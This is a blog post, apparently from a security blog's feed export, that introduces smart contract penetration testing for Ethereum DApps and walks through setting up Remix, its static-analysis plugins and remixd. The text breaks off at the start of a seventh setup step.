tag:blogger.com,1999:blog-79470802449541918212024-03-13T03:29:00.862-07:00Elusive ThoughtsWeb Application Security, Hacking, Windows Security, Cross Site Scripting, SQL Injection, XSS, XXE, XMLUnknownnoreply@blogger.comBlogger57125tag:blogger.com,1999:blog-7947080244954191821.post-65846740498246544352022-07-23T10:03:00.002-07:002022-07-23T10:03:52.184-07:00Hacking Solidity For fun and profit <h2 style="text-align: left;">Introduction </h2><div style="text-align: justify;">After a long period of silence I am now going to write a post for hacking Solidity smart contracts for dummies (like me). The easiest way to pen-test Solidity smart contracts is through <a href="https://remix.ethereum.org/" target="_blank">REMIX</a>!!!!! This post provides an introduction to the world of smart contract security for people with a background in traditional cyber security and little knowledge of crypto and blockchain tech. While other smart contract platforms exist, we will be focusing on Ethereum, which is currently the most widely adopted platform. </div><h2 style="text-align: justify;">The Landscape In Smart Contracts</h2><div>When you will start hacking smart contracts, you will instantly understand that there is NO DOCUMENTATION or NOOOOOO TUTORIALS or NO NOTHING. Do not get depressed, Elusive Thoughts is here to help you!!!. </div><div> <div class="separator" style="clear: both; text-align: center;"><a href="https://clipground.com/images/panic-png-5.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="316" data-original-width="380" height="316" src="https://clipground.com/images/panic-png-5.png" width="380" /></a></div><br /></div><div>First go through <a href="https://github.com/ethereumbook/ethereumbook">Mastering Ethereum</a>, then you are good to go.</div><div><h2 style="text-align: left;">Web Apps Versus DApps</h2></div><div><div style="text-align: justify;">On my quest to Solidity hacking,<span style="color: #f9cb9c;"> </span><span style="background-color: #fcff01;">I found this awesome info on arvanaghi</span><span style="color: #f9cb9c;"> </span>(see references below) so enjoy. When your browser interacts with a regular web application, the web app might speak to other internal servers, databases, or a cloud. </div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">In the end, the interaction is simple:</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://arvanaghi.com/assets/Pentesting%20Ethereum%20dApps/standardWebApp.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="378" data-original-width="710" height="341" src="https://arvanaghi.com/assets/Pentesting%20Ethereum%20dApps/standardWebApp.gif" width="640" /></a></div><br /><div style="text-align: justify;"><br /></div><div style="text-align: justify;">In a DApp, most interactions are the same. But there’s a third element: the smart contract, which is publicly accessible. Some interactions with the web application will lead to either a read or a write to one or multiple smart contracts on the Ethereum blockchain.</div><div style="text-align: justify;"> </div><div class="separator" style="clear: both; text-align: center;"><a href="https://arvanaghi.com/assets/Pentesting%20Ethereum%20dApps/standardDapp.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="378" data-original-width="710" height="341" src="https://arvanaghi.com/assets/Pentesting%20Ethereum%20dApps/standardDapp.gif" width="640" /></a></div><br /><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Because smart contracts are publicly accessible, we can interact with them directly, unimpeded by the web server logic that might limit what transactions we can issue.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><div>So far, we have a two-pronged approach to our hacking quest:</div><div><ul><li>A standard web application we can hack by simply exploiting, authentication, access controls, and session management etc.</li><li>A DApp application has a Web Component and the smart contract audit element.</li></ul><div><b>Note:</b> In other words, we check for logical and input validation errors in both the web application and the smart contract logic.</div><div><br /></div><div>Below we can visualize the flows described:</div></div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://arvanaghi.com/assets/Pentesting%20Ethereum%20dApps/twoprongedapproach.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="431" data-original-width="800" height="345" src="https://arvanaghi.com/assets/Pentesting%20Ethereum%20dApps/twoprongedapproach.png" width="640" /></a></div><br /><div><br /></div></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><b>Note:</b> In order to interact with the chain directly, you can use a wallet such as Metamask.</div><div style="text-align: justify;"><h2>Hacking DApps</h2><div>When you create a Smart Contract, some kind of message is sent to the Blockchain. This message allows you to access your contract. So that no one else but the creator of the Smart Contract can change anything (become a super user!!). W<span style="color: #ff00fe;">e essentially create a new variable of type address called “owner”. In Solidity language we use modifiers to expand the mentioned concept by altering function execution flow.</span></div><div><br /></div></div><div style="text-align: justify;">In Solidity, modifiers express what actions are occurring in a declarative and readable manner. They are similar to the decorator pattern used in Object Oriented Programming. In Solidity functions are tagged with the label modifier to control access, or put in other words, modifiers are used to modify the behavior of a function. For example you can add a prerequisite to a function, in order to execute.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Below we can see a simple modifier example:</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><div><i> modifier onlyOwner {</i></div><div><i> require(msg.sender == owner); </i></div><div><i> // The message sender has to be the owner (msg.sender is an environment variable )</i></div><div><i> _; </i></div><div><i> // Execution body from function to alter.</i></div><div><i> }</i></div><div><br /></div><div><b>Note:</b> Here we define a modifier. </div></div><div style="text-align: justify;"><span style="background-color: #ff00fe;"><div><br /></div><div>Below we can see how modifier is used (through function tagging):</div><div><br /></div><div><div><i> function writeData(bytes32 data) public onlyOwner returns (bool success) {</i></div><div><i> // will only run if owner sent transaction</i></div><div><i> }</i></div></div><div><br /></div><div>Because of modifiers, though, there’s actually a third prong to our attack we can have to consider. </div><div><br /></div><div>Below we can see the flow of what we just described:</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://arvanaghi.com/assets/Pentesting%20Ethereum%20dApps/threeprongedapproach.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="420" data-original-width="800" height="336" src="https://arvanaghi.com/assets/Pentesting%20Ethereum%20dApps/threeprongedapproach.png" width="640" /></a></div><br /><div>Because DApps deal with Ethereum accounts, they are based on public key authentication. Not password authentication is used most of the time (serious DApps use JWT tokens in conjunction with the public key authentication). <span style="background-color: transparent;">Though we can interact directly with the smart contract, we can’t execute functions when modifiers like onlyOwner are properly implemented. </span></div><div><span style="background-color: transparent; color: #ff00fe;"><br /></span></div><div>This means that the server is acting as a middle man, between you and the blockchain, or put simple, the "wallet of the DApp server" has the address of the owner (not always) and the private keys and you don't. A DApp, with proper security architecture does not follow the mentioned design patterns. Meaning that if we implement proper RBAC we are good to go. Also the majority of DApp now is still using the mentioned bad design patterns.</div><div><span style="background-color: transparent; color: #ff00fe;"><br /></span></div><div><span style="background-color: transparent;"></span><span style="background-color: transparent; color: #ff00fe;">When dealing with a DApp, the private keys to these privileged addresses almost certainly exist on the web server.</span><span style="background-color: transparent;"> And the web application almost certainly has logic that takes user input over the web and calls a privileged function in the smart contract using one of those keys.</span></div></span></div><div style="text-align: justify;"><br /></div>All this considered, we have our attack surface:<br /><ul style="text-align: left;"><li>A standard web application assessment requires to test for typical OWASP Top 10 vulnerabilities and you are covered.</li><li>A smart contract audit of the source code. </li><li>Attempting to forge privileged writes to the smart contract through the web interface. Can you get the web application to interact with the smart contract in a way it didn’t expect?</li></ul><div>So to test the DApp, we would have to use a Web Proxy such as Burp and also review and test the Solidity code (perform both dynamic and static code analysis). Because I dedicated my life writing post on web app testing, I am going to skip the web testing. But what you should remember is that always check key privilege checks, when testing DApps. </div><div><br /></div><div><span style="color: #ff00fe;"><b>Note:</b> Also if you try to hack legitimate DApps, without permission, you should now that it is illegal and escaping with the funds is not easy, you are going to get caught in a tornado mesh. </span><br /></div><h2 style="text-align: left;">Solidity Tools For Hacking</h2></div><div style="text-align: justify;">Tops tools for automating part of the Smart Contract pen-test are:</div><div><ul style="text-align: left;"><li style="text-align: justify;"><a href="https://remix.ethereum.org/#optimize=false&runs=200&evmVersion=null&version=soljson-v0.8.7+commit.e28d00a7.js" target="_blank">REMIX</a> - Remix IDE is used for the entire journey of smart contract development by users at every knowledge level.<b> It requires no setup</b>, fosters a fast development cycle and has a rich set of plugins with intuitive GUIs. The IDE comes in 2 flavors (web app or desktop app) and as a <b>VSCode extension.</b></li><li style="text-align: justify;"><a href="https://code.visualstudio.com/" target="_blank">VSCode</a> - Visual Studio Code is a lightweight but powerful source code editor which runs on your desktop and is available for Windows, macOS and Linux. It comes with built-in support for JavaScript, TypeScript and Node.js and has a rich ecosystem of extensions for other languages and runtimes (such as C++, C#, Java, Python, PHP, Go, .NET). </li><li style="text-align: justify;"><a href="https://github.com/crytic/slither" target="_blank">Slither</a> - Slither is a Solidity static analysis framework written in Python 3. It runs a suite of vulnerability detectors, prints visual information about contract details, and provides an API to easily write custom analyses. Slither enables developers to find vulnerabilities, enhance their code comprehension, and quickly prototype custom analyses.</li><li style="text-align: justify;"><a href="Mythril" target="_blank">Mythril</a> - Mythril is a security analysis tool for EVM bytecode. It detects security vulnerabilities in smart contracts built for Ethereum, Hedera, Quorum, Vechain, Roostock, Tron and other EVM-compatible blockchains. It uses symbolic execution, SMT solving and taint analysis to detect a variety of security vulnerabilities. It's also used (in combination with other tools and techniques) in the MythX security analysis platform.</li></ul></div><div><h2 style="text-align: justify;">Setting Up The Hacking Environment </h2></div><div>The biggest pain on Solidity Smart contract testing is to configure and add the libraries, so as for the project to run smoothly. Not anymore, here see an easy way to do it.</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://external-content.duckduckgo.com/iu/?u=https%3A%2F%2Ffreepngimg.com%2Fthumb%2Fpain%2F40861-6-pain-in-the-neck-download-hq-png.png&f=1&nofb=1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="426" data-original-width="400" height="426" src="https://external-content.duckduckgo.com/iu/?u=https%3A%2F%2Ffreepngimg.com%2Fthumb%2Fpain%2F40861-6-pain-in-the-neck-download-hq-png.png&f=1&nofb=1" width="400" /></a></div><div><br /></div><div><br /></div><div><b>Step One: </b>Load the project from Github to Remix :- In the top left corner clieck Clone Git Repository.</div><div><br /></div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJTLmwgIBK7y6ZXCIqEUXqrkAuLmx8lRZVY2iPIUw2VjohKPeeJ6mzHDjPvbN2tHuPW8VIC4fCp78x_5JqtomNGOSgNoobOjmQs-opKksXCNmV94oWruyULGQpClbRJj_FtbRgsn2L3u5zH8BYWajneRQY1D64cgRDyvFCDZa1ekqik8_WAC0pweom/s317/Screenshot%20from%202022-07-21%2015-07-37.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="142" data-original-width="317" height="179" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJTLmwgIBK7y6ZXCIqEUXqrkAuLmx8lRZVY2iPIUw2VjohKPeeJ6mzHDjPvbN2tHuPW8VIC4fCp78x_5JqtomNGOSgNoobOjmQs-opKksXCNmV94oWruyULGQpClbRJj_FtbRgsn2L3u5zH8BYWajneRQY1D64cgRDyvFCDZa1ekqik8_WAC0pweom/w400-h179/Screenshot%20from%202022-07-21%2015-07-37.png" width="400" /></a></div><br /><b>Note:</b> Most of the time the client will give you a public git repo URL to load the code (or a private git repo URL). Now with Remix, you can load that it directly.</div><div><br /></div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4Bl8Cg7U4ntwPhNKbosvTVMS6QqYq-RoqJ7jh_etDaB2UckoTl2ig6xeEhAWpkopbuJzCu3cGIJIPLx5dIso-M2Bw2Zl_NN8-nwExyHAFqLksixEK5fsMUfrClciADkdo4grgh7ahNGXZs-F3Uxwva_0Dgw03GjcoefqywVd9JpoRMG1xVAAwzT-2/s480/Screenshot%20from%202022-07-21%2015-30-12.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="169" data-original-width="480" height="141" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4Bl8Cg7U4ntwPhNKbosvTVMS6QqYq-RoqJ7jh_etDaB2UckoTl2ig6xeEhAWpkopbuJzCu3cGIJIPLx5dIso-M2Bw2Zl_NN8-nwExyHAFqLksixEK5fsMUfrClciADkdo4grgh7ahNGXZs-F3Uxwva_0Dgw03GjcoefqywVd9JpoRMG1xVAAwzT-2/w400-h141/Screenshot%20from%202022-07-21%2015-30-12.png" width="400" /></a></div><br /><div><b><br /></b></div><div><b>Note:</b> When you upload confidential information in Remix, you better have the permission or the code is patented.</div><div><br /></div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhs_Am079RozwfkC7IAVxZHo-xvRdJIDiFL0d3JIK9Em8tjtRiSt5gtgWqald8rJ3VSEtz7JA43yQctdjlftTILdJSlqYsDuy85G4CkclmV9GeF6NoE64yvnk8VAHQ6yfDwXJtCcS2Selum0o9YAwCLSW0-jFi6yvZTzkMN-DvQwQt-guLrDnYurgDm/s301/Screenshot%20from%202022-07-21%2015-32-40.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="280" data-original-width="301" height="372" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhs_Am079RozwfkC7IAVxZHo-xvRdJIDiFL0d3JIK9Em8tjtRiSt5gtgWqald8rJ3VSEtz7JA43yQctdjlftTILdJSlqYsDuy85G4CkclmV9GeF6NoE64yvnk8VAHQ6yfDwXJtCcS2Selum0o9YAwCLSW0-jFi6yvZTzkMN-DvQwQt-guLrDnYurgDm/w400-h372/Screenshot%20from%202022-07-21%2015-32-40.png" width="400" /></a></div><br /> </div><div><b>Step Two: </b>Compile your code and troubleshoot :- </div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcSTSBSxculiOpSY_2HYyrxqiXQ8Yu444g3N_drGOoUnJWA45gAIstFBdyeOO2PAaZB26yqCiTaoQNb_cuizVN-cEx-T5NaLvzF_hagwC0Y7aaJtv_h2jCEKWvp4SXy3QFmUuFIY5l7E6zCXXvRcxTEsDNhNj5j4fpSol1dEm9WsANblHhChjlUs_D/s372/Screenshot%20from%202022-07-21%2015-38-13.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="372" data-original-width="299" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcSTSBSxculiOpSY_2HYyrxqiXQ8Yu444g3N_drGOoUnJWA45gAIstFBdyeOO2PAaZB26yqCiTaoQNb_cuizVN-cEx-T5NaLvzF_hagwC0Y7aaJtv_h2jCEKWvp4SXy3QFmUuFIY5l7E6zCXXvRcxTEsDNhNj5j4fpSol1dEm9WsANblHhChjlUs_D/w321-h400/Screenshot%20from%202022-07-21%2015-38-13.png" width="321" /></a></div><div><br /></div><b>Note:</b> It does worth mentioning that the Remix compiler will also generate the relevant project files. Which you can download and use on your workstation with some modifications. <br /><div><br /></div><div><b>Step Three:</b> Fixing import errors:- </div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQiKsP4l5BpPVHucyAQSsEHgBgHHZY0vfRarC1XHaVBAU0thF43wypalOwJBUsrQTJo1H7CtQzAf9WFG-paGKFY8yka_L9h8YclZNxLa4HBt9aQSygTjMEvPO4Wx94ZJxzp62nJutOYgDpL11dN2lpXmmfz42rEqpv3LShGnjGKzkUdlZ6YUQoOfez/s925/Screenshot%20from%202022-07-21%2016-24-50.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="925" data-original-width="294" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQiKsP4l5BpPVHucyAQSsEHgBgHHZY0vfRarC1XHaVBAU0thF43wypalOwJBUsrQTJo1H7CtQzAf9WFG-paGKFY8yka_L9h8YclZNxLa4HBt9aQSygTjMEvPO4Wx94ZJxzp62nJutOYgDpL11dN2lpXmmfz42rEqpv3LShGnjGKzkUdlZ6YUQoOfez/w203-h640/Screenshot%20from%202022-07-21%2016-24-50.png" width="203" /></a></div><br /><div>In order to resolve the issue we refer to the online tutorial REMIX guide found <a href="https://remix-ide.readthedocs.io/en/latest/import.html" target="_blank">here</a>. Which says more or less to replace the original path:</div><blockquote><i>import "../../utils/introspection/IERC165.sol";</i></blockquote><div>with </div><div><blockquote><i>https://github.com/OpenZeppelin/openzeppelin-contracts/blob/master/contracts/utils/introspection/IERC165.s</i>ol</blockquote></div><div><br /></div><div>And then taddaaaaaa magic happens, the code is compiles!!!</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTeQ5TaV2AuV6pu1nWBh-34DxrFxSCWekFb2efEa4Gd04HOLc2AuyVetHVyvezMRPlnM3vPmcnteWvNWKPUIjxWjrpOtaGGvfXH8C424MFkXNyhVVXftedzei6oToF8ahMZdRR9rxCbLUpq0uNf9VAYS1dFjSXMeDjR8Q4CmPojSnmsE5p-tFYFHMW/s785/Screenshot%20from%202022-07-21%2016-43-49.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="469" data-original-width="785" height="382" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTeQ5TaV2AuV6pu1nWBh-34DxrFxSCWekFb2efEa4Gd04HOLc2AuyVetHVyvezMRPlnM3vPmcnteWvNWKPUIjxWjrpOtaGGvfXH8C424MFkXNyhVVXftedzei6oToF8ahMZdRR9rxCbLUpq0uNf9VAYS1dFjSXMeDjR8Q4CmPojSnmsE5p-tFYFHMW/w640-h382/Screenshot%20from%202022-07-21%2016-43-49.png" width="640" /></a></div><br /><div><br /></div><div><h2 style="text-align: justify;">Remix Debugging and Security Plugins</h2></div><div style="text-align: justify;">Remix besides an online compiler has also awesome!!!! plugins, including that of static analysis for debugging. Static code analysis is a process to debug the code by examining it and without actually executing the code. Solidity Static Analysis plugin performs static analysis on Solidity smart contracts once they are compiled. It checks for security vulnerabilities and bad development practices, among other issues. It can be activated from Remix Plugin Manager.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Another plugin you would like to also install is MythX by ConsenSys. MythX is a security analysis service and performs Static and Dynamic Security Analysis using the MythX Cloud Service. MythX offers a suite of analysis techniques that automatically detects security vulnerabilities in Ethereum smart contracts. </div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><b>Note:</b> Mythx requires an API key to work with Remix.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><b>Step Four: </b>Installing the static analysis plugin. In order to install the plugin, go in the left bottom corner.</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhE_eRbEBzB_vilJTBlxf7B0l6b3MxUB2j3kUq12R-4-QCYLMSa_x_KzneNa3twtwjs-cdtzDmO4V5i6ba4WdKALIImFYTH7ZbIUvKgXQ3MbGmMlPJpcmEI_oTQ3OWSdFD7UfmwvqVhWaxUA-Y9jX2lT2fGP0g9LwIhJ58WIrhwFmrbXGvGrTcPcw9C/s334/Screenshot%20from%202022-07-23%2014-22-34.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="334" data-original-width="221" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhE_eRbEBzB_vilJTBlxf7B0l6b3MxUB2j3kUq12R-4-QCYLMSa_x_KzneNa3twtwjs-cdtzDmO4V5i6ba4WdKALIImFYTH7ZbIUvKgXQ3MbGmMlPJpcmEI_oTQ3OWSdFD7UfmwvqVhWaxUA-Y9jX2lT2fGP0g9LwIhJ58WIrhwFmrbXGvGrTcPcw9C/w265-h400/Screenshot%20from%202022-07-23%2014-22-34.png" width="265" /></a></div><div><br /></div><b>Step Five: </b>Use the search manager to find the plugins you like to do your hacks (type static analysis).<br /><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxK9YVbGwcpMRvogkYFEb0WKWsmeAOWRFqyuyj4JaJ96Q99Pw6rs0Z7grCaBZqDuQkMa7WClHC6pY4tqzdTffzTQ-H7XoFVqFqUXban7SLX7OD-2Qb76xWcYBhdpusBcfqZWLyYKsEQE4pLNsfJ56x0XPOphYoAZGXvb3tfScokxsEriYXdTrFNDyF/s936/Screenshot%20from%202022-07-23%2014-25-02.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="936" data-original-width="368" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxK9YVbGwcpMRvogkYFEb0WKWsmeAOWRFqyuyj4JaJ96Q99Pw6rs0Z7grCaBZqDuQkMa7WClHC6pY4tqzdTffzTQ-H7XoFVqFqUXban7SLX7OD-2Qb76xWcYBhdpusBcfqZWLyYKsEQE4pLNsfJ56x0XPOphYoAZGXvb3tfScokxsEriYXdTrFNDyF/w252-h640/Screenshot%20from%202022-07-23%2014-25-02.png" width="252" /></a></div><div><br /></div><div><b><br /></b></div><div><b>Note:</b> There are numerous plugins you can choose from to install. Search the ones you like. </div><div><br /></div><div>Below we can see the plugins to install (static analysis):</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5f282DJ6VRPqI9RXN4RKgDCTGXsypNGHYcHVL5ToA-Cm3zLLhSMGhAgAfcFVXBlD2sBYUht_MarRa7HS8_r9xlYROQMyOA0ELFXvPtCpDibK24FfFjIYzpTL2bqKVs-jKH_5jeFL3FIWtc7lLxRh3CmzRJgghMyEfBGAgTo9BnkxIpdg_ngFLf-5V/s399/Screenshot%20from%202022-07-23%2014-30-16.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="399" data-original-width="383" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5f282DJ6VRPqI9RXN4RKgDCTGXsypNGHYcHVL5ToA-Cm3zLLhSMGhAgAfcFVXBlD2sBYUht_MarRa7HS8_r9xlYROQMyOA0ELFXvPtCpDibK24FfFjIYzpTL2bqKVs-jKH_5jeFL3FIWtc7lLxRh3CmzRJgghMyEfBGAgTo9BnkxIpdg_ngFLf-5V/w384-h400/Screenshot%20from%202022-07-23%2014-30-16.png" width="384" /></a></div><br /><div>Below we can see the plugins to install (MYTHX):</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjekQZ_LEplXScpMf2iJsQzZFEHxtXNpJQFAdVb5po2K-WFY_fuLOWh_J8dDBXfSv72NGnlWgIZoIUXHSEmYBt0UOEE-5YHTMpUFhszszfafbWdG7O3tU8AvPI6N93ixFuBvQ-6vzSBG9RExfF8DgZQtHfnxcUFIRtL6b9T0Ak2r8mhm0Uf-QLSicku/s399/Screenshot%20from%202022-07-23%2014-31-59.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="399" data-original-width="383" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjekQZ_LEplXScpMf2iJsQzZFEHxtXNpJQFAdVb5po2K-WFY_fuLOWh_J8dDBXfSv72NGnlWgIZoIUXHSEmYBt0UOEE-5YHTMpUFhszszfafbWdG7O3tU8AvPI6N93ixFuBvQ-6vzSBG9RExfF8DgZQtHfnxcUFIRtL6b9T0Ak2r8mhm0Uf-QLSicku/w384-h400/Screenshot%20from%202022-07-23%2014-31-59.png" width="384" /></a></div><br /><div><br /></div><div><b>Note:</b> The plugin has dependency <i>Solidity Compiler plugin</i>, you need to activate in also.</div><div><br /></div><div>The static analysis plugin checks for the following security issues:</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAxjrCywwEbyv4mi4BY8CLTk0zC6mpb2ZTO-y1GkNo1NG98-Gb1n40pg9gdeDmPaXezyVpfffc3hg_APIivRCwxWgqzLbFyJGCqDQB1ajvBWg2atPd3xzPcS0-b_4ytZwSGSZJrYMHFCCs7qkvZ5WQXA_zSkuanOCcj66o_hiKI3bfD1jWv-LAEXHc/s454/Screenshot%20from%202022-07-23%2015-10-26.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="454" data-original-width="340" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAxjrCywwEbyv4mi4BY8CLTk0zC6mpb2ZTO-y1GkNo1NG98-Gb1n40pg9gdeDmPaXezyVpfffc3hg_APIivRCwxWgqzLbFyJGCqDQB1ajvBWg2atPd3xzPcS0-b_4ytZwSGSZJrYMHFCCs7qkvZ5WQXA_zSkuanOCcj66o_hiKI3bfD1jWv-LAEXHc/w300-h400/Screenshot%20from%202022-07-23%2015-10-26.png" width="300" /></a></div><br /><div><br /></div><div>The plugin static analysis also looks for non-security issues. Some of the issues shown below can be used to perform Gas Denial of Service attacks so pay attention!!!!!: </div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOWOs6nWC_NZGJOKEQsA97Y1M7l3dSoJ2dBXKPec-7MGoOqr0Edi-8vhpVQKye0KYhOCijakMeInECUVRJhFKBnG9-FghOIy1o1yjVyNeu_degRVjm7zQAnWqXF5I2Lcm68MvbEbJ9ismO70h0jC3zjsAjTMyuuufGCQZWG9EMofExyTq_ywrBy1vi/s879/Screenshot%20from%202022-07-23%2015-09-39.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="879" data-original-width="343" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOWOs6nWC_NZGJOKEQsA97Y1M7l3dSoJ2dBXKPec-7MGoOqr0Edi-8vhpVQKye0KYhOCijakMeInECUVRJhFKBnG9-FghOIy1o1yjVyNeu_degRVjm7zQAnWqXF5I2Lcm68MvbEbJ9ismO70h0jC3zjsAjTMyuuufGCQZWG9EMofExyTq_ywrBy1vi/s16000/Screenshot%20from%202022-07-23%2015-09-39.png" /></a></div><br /><div><div>The report generated by the static analysis plugin will look like this:</div></div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhabTUK_oFgKNvcu2yHPVRRy3I4cAwgQcV5pVfED3_yZhSdJIrjcRNiZGpE5Q3ouOu3ATDBQyoN7bbIkdfNjnbjOj8E023y-cCZvzwVwl5rkdnvRT1aRG7qx9qxGJOhdEyKdFlcfiXOpbIchYAr3dkW_RED0UDGt3OMWf-kMovEGScI3GlOogbAJgqw/s338/Screenshot%20from%202022-07-23%2015-16-48.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="332" data-original-width="338" height="393" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhabTUK_oFgKNvcu2yHPVRRy3I4cAwgQcV5pVfED3_yZhSdJIrjcRNiZGpE5Q3ouOu3ATDBQyoN7bbIkdfNjnbjOj8E023y-cCZvzwVwl5rkdnvRT1aRG7qx9qxGJOhdEyKdFlcfiXOpbIchYAr3dkW_RED0UDGt3OMWf-kMovEGScI3GlOogbAJgqw/w400-h393/Screenshot%20from%202022-07-23%2015-16-48.png" width="400" /></a></div><b><div><b><br /></b></div>Note:</b> Some of the findings can be false positives, so take care. Make sure you <span style="color: red;">untick the external library option if the libraries are trusted.</span><h2 style="text-align: left;">Interacting From Your Machine With Remix </h2><div style="text-align: justify;">The next step would be, to see how we can interact with Remix, locally from our machine. For a complex project, you can't just copy paste the single sol file and let it run. To make our life easier, Remix has <span style="color: #ff00fe;">localhost connection</span> which allows you to interact with your project in your local machine remotely. This is something I'm used to doing when the project has a large number of inheritant contracts. Obviously, this make our life easier than ever by just downloading the git project and do some commands.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">remixd is a tool that intend to be used with Remix IDE (aka. Browser-Solidity). It allows a websocket connection between Remix IDE (the DApp) and the local computer. You can also use Burp to intercept the remixd traffic (although is not going to be easy). Practically Remix IDE makes available a folder shared by remixd. If you would like to install the tool follow the steps below (remixd needs npm and node).</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><i>yarn global add @remix-project/remixd</i></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><b>Note:</b> Alternatively remixd can be used to setup a development environment that can be used with other popular frameworks like Embark, Truffle, Ganache, etc. The command above will work in most linux distributions.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><b>Step Six: </b>Go to WorkSpaces and click "Connect to Localhost"</div><div class="separator" style="clear: both; text-align: center;"><br /></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuF3W_6lbcIm38NqRkHSdV59tSuGA8kU0zduTVbKuhzm3PLad0XmzRbBt9WADsm5ZHyFHinuyZlHK3e8_RBpqo141VcQK78XkbBfkF9Ufx3R_DKw0ZAqNM_Gy0NK2i5nG6gAMC30_23qPc2gJcbb8_4qQ6S_mBn4eir9qKjH10R0EJhqlPaiEPD5sO/s254/Screenshot%20from%202022-07-23%2018-44-23.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="122" data-original-width="254" height="122" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuF3W_6lbcIm38NqRkHSdV59tSuGA8kU0zduTVbKuhzm3PLad0XmzRbBt9WADsm5ZHyFHinuyZlHK3e8_RBpqo141VcQK78XkbBfkF9Ufx3R_DKw0ZAqNM_Gy0NK2i5nG6gAMC30_23qPc2gJcbb8_4qQ6S_mBn4eir9qKjH10R0EJhqlPaiEPD5sO/s1600/Screenshot%20from%202022-07-23%2018-44-23.png" width="254" /></a></div><div><br /></div><b style="text-align: justify;">Step Seven: 